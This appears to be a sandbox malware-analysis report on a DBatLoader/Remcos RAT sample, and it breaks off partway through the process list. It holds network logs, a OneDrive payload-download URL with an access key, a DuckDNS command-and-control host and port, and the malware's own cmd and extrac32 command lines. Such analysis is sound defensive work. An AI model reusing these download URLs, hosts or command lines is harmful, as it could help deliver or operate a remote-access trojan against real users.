Apr 18, 2024 21:26:51.640269995 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:51.640295029 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.017973900 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.018174887 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.021091938 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.021106958 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.021477938 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.072983980 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.087528944 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.128117085 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.384566069 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.384675026 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.384741068 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.405451059 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.405478954 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:52.405502081 CEST | 49705 | 443 | 192.168.2.5 | 13.107.139.11
Apr 18, 2024 21:26:52.405509949 CEST | 443 | 49705 | 13.107.139.11 | 192.168.2.5
Apr 18, 2024 21:26:55.785291910 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:56.123765945 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:26:56.123945951 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:56.124862909 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:56.517659903 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:26:56.577861071 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:26:56.580111027 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:56.918478966 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:26:56.968122005 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:57.398960114 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:26:57.603097916 CEST | 80 | 49708 | 178.237.33.50 | 192.168.2.5
Apr 18, 2024 21:26:57.603169918 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:26:57.603413105 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:26:57.812165976 CEST | 80 | 49708 | 178.237.33.50 | 192.168.2.5
Apr 18, 2024 21:26:57.812242985 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:26:57.860125065 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:26:58.252233028 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:26:58.811583042 CEST | 80 | 49708 | 178.237.33.50 | 192.168.2.5
Apr 18, 2024 21:26:58.811671972 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:27:11.325884104 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:27:11.328144073 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:27:11.720913887 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:27:41.339776993 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:27:41.395857096 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:27:42.068651915 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:27:42.456818104 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:28:11.352612972 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:28:11.353868008 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:28:11.752130985 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:28:41.370573997 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:28:41.372165918 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:28:41.767669916 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:28:47.270982027 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:28:47.864898920 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:28:48.958183050 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:28:50.973803043 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:28:55.051925898 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:29:03.164782047 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:29:11.385348082 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:29:11.387413025 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:29:11.783479929 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:29:19.364510059 CEST | 49708 | 80 | 192.168.2.5 | 178.237.33.50
Apr 18, 2024 21:29:41.398180962 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:29:41.399560928 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:29:41.783452988 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:30:11.415009975 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:30:11.416225910 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:30:11.814536095 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:30:41.432210922 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Apr 18, 2024 21:30:41.433906078 CEST | 49707 | 1188 | 192.168.2.5 | 103.186.117.171
Apr 18, 2024 21:30:41.830257893 CEST | 1188 | 49707 | 103.186.117.171 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 21:26:51.496304989 CEST | 53160 | 53 | 192.168.2.5 | 1.1.1.1
Apr 18, 2024 21:26:52.408993959 CEST | 62646 | 53 | 192.168.2.5 | 1.1.1.1
Apr 18, 2024 21:26:55.586582899 CEST | 58979 | 53 | 192.168.2.5 | 1.1.1.1
Apr 18, 2024 21:26:55.729940891 CEST | 53 | 58979 | 1.1.1.1 | 192.168.2.5
Apr 18, 2024 21:26:57.288090944 CEST | 65341 | 53 | 192.168.2.5 | 1.1.1.1
Apr 18, 2024 21:26:57.394279957 CEST | 53 | 65341 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 18, 2024 21:26:51.496304989 CEST | 192.168.2.5 | 1.1.1.1 | 0x2be7 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:52.408993959 CEST | 192.168.2.5 | 1.1.1.1 | 0x5013 | Standard query (0) | gjc1pa.dm.files.1drv.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:55.586582899 CEST | 192.168.2.5 | 1.1.1.1 | 0x346 | Standard query (0) | jantis.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:57.288090944 CEST | 192.168.2.5 | 1.1.1.1 | 0x4f14 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 18, 2024 21:26:51.601991892 CEST | 1.1.1.1 | 192.168.2.5 | 0x2be7 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 21:26:51.601991892 CEST | 1.1.1.1 | 192.168.2.5 | 0x2be7 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 21:26:51.601991892 CEST | 1.1.1.1 | 192.168.2.5 | 0x2be7 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 21:26:51.601991892 CEST | 1.1.1.1 | 192.168.2.5 | 0x2be7 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:51.601991892 CEST | 1.1.1.1 | 192.168.2.5 | 0x2be7 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:52.683723927 CEST | 1.1.1.1 | 192.168.2.5 | 0x5013 | No error (0) | gjc1pa.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 21:26:52.683723927 CEST | 1.1.1.1 | 192.168.2.5 | 0x5013 | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 18, 2024 21:26:55.729940891 CEST | 1.1.1.1 | 192.168.2.5 | 0x346 | No error (0) | jantis.duckdns.org | | 103.186.117.171 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 21:26:57.394279957 CEST | 1.1.1.1 | 192.168.2.5 | 0x4f14 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• onedrive.live.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 178.237.33.50 | 80 | 2800 | C:\Windows\SysWOW64\colorcpl.exe
Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 21:26:57.603413105 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 18, 2024 21:26:57.812165976 CEST | 1171 | IN | HTTP/1.1 200 OK
date: Thu, 18 Apr 2024 19:26:57 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 13.107.139.11 | 443 | 1436 | C:\Users\user\Desktop\XY2I8rWLkM.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 19:26:52 UTC | 213 | OUT | GET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-04-18 19:26:52 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc-0XgtOyfEmk3l9_83jLmgZ2XvHiZV81lGwhk3hoLi_u_lez5ikWuSMi7ZPKtzKc9_by89lh4ugGGSq3lKtxM-ABvpU3qEZgGAX9cW_UuxSLLdL9xjTc2Wi6XCE1pCmcgQQww3qsERCm4EmLefCho1ag/255_Ocihlomcwix?download&psid=1
Set-Cookie: E=P:tOIagN1f3Ig=:odl7qcUcXZKlT811Mz+5kFrZYozcOtTexwLEsOew5Ag=:F; domain=.live.com; path=/
Set-Cookie: xid=e5095892-35e0-4306-8393-ca9ba3c59257&&ODSP-ODWEB-ODCF&146; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 18-Apr-2024 17:46:52 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 25-Apr-2024 19:26:52 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 5fd6fc6db4-t7gcx
X-ODWebServer: nameastus2946819-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 41822A55E36F4DB18E817589FA33381C Ref B: BN3EDGE1011 Ref C: 2024-04-18T19:26:52Z
Date: Thu, 18 Apr 2024 19:26:52 GMT
Connection: close
Content-Length: 0

                                                                                                                            Target ID:0
                                                                                                                            Start time:21:26:50
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\XY2I8rWLkM.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
                                                                                                                            Imagebase:0x790000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF
                                                                                                                            Imagebase:0x230000
                                                                                                                            File size:29'184 bytes
                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:21:26:54
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                            Imagebase:0x530000
                                                                                                                            File size:86'528 bytes
                                                                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:6
                                                                                                                            Start time:21:26:54
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:7
                                                                                                                            Start time:21:27:04
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Ocihlomc.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Ocihlomc.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:21:27:05
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                            Imagebase:0xe90000
                                                                                                                            File size:226'712 bytes
                                                                                                                            MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:21:27:12
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Ocihlomc.PIF
